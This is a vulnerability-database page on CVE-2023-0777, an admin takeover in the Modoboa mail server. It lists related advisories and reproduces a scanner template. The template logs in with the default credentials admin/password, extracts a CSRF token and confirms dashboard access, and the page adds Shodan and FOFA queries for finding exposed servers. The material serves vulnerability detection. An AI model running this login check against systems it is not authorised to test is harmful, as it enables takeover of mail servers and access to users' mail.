| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| modoboa 2.0.4 - Admin Account Takeover Exploit | 6 Apr 202300:00 | – | zdt | |
| Admin TakeOver | 26 Jan 202318:43 | – | huntr | |
| CVE-2023-0777 | 24 Mar 202516:22 | – | circl | |
| modoboa 安全漏洞 | 10 Feb 202300:00 | – | cnnvd | |
| CVE-2023-0777 | 10 Feb 202300:00 | – | cve | |
| CVE-2023-0777 Authentication Bypass by Primary Weakness in modoboa/modoboa | 10 Feb 202300:00 | – | cvelist | |
| modoboa 2.0.4 - Admin TakeOver | 6 Apr 202300:00 | – | exploitdb | |
| Authentication Bypass in modoboa | 10 Feb 202321:30 | – | github | |
| CVE-2023-0777 | 10 Feb 202319:15 | – | nvd | |
| CVE-2023-0777 Authentication Bypass by Primary Weakness in modoboa/modoboa | 10 Feb 202300:00 | – | osv |
id: CVE-2023-0777
info:
name: modoboa 2.0.4 - Admin TakeOver
author: r3Y3r53
severity: critical
description: |
Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.
impact: |
Unauthenticated attackers can exploit authentication bypass using default credentials to gain administrator access and completely compromise Modoboa email server installations.
remediation: update to version 2.0.4
reference:
- https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/
- http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html
- https://github.com/modoboa/modoboa/commit/47d17ac6643f870719691073956a26e4be0a4806
- https://github.com/7h3h4ckv157/7h3h4ckv157
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0777
cwe-id: CWE-305,NVD-CWE-Other
epss-score: 0.15088
epss-percentile: 0.96313
cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: modoboa
product: modoboa
shodan-query:
- html:"Modoboa"
- http.favicon.hash:1949005079
- http.html:"modoboa"
fofa-query:
- body="Modoboa"
- body="modoboa"
- icon_hash=1949005079
tags: cve2023,cve,huntr,packetstorm,modoboa,default-login,vuln
http:
- raw:
- |
GET /accounts/login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /accounts/login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F
- |
GET /dashboard/ HTTP/1.1
Host: {{Hostname}}
payloads:
username:
- admin
password:
- password
attack: pitchfork
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "Dashboard") && contains(body_3, "Hello admin")'
condition: and
extractors:
- type: regex
part: header
name: csrftoken
internal: true
group: 1
regex:
- csrftoken=([A-Za-z0-9]+)
# digest: 4a0a004730450220120307dd5cf0c6518e208bc042737795f5ec2a7b960bcbbb5eceb7bd54e1ef35022100e7b5325dc875f7f554eeb998ba487465443072e287810607db46eb273f72dc92:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation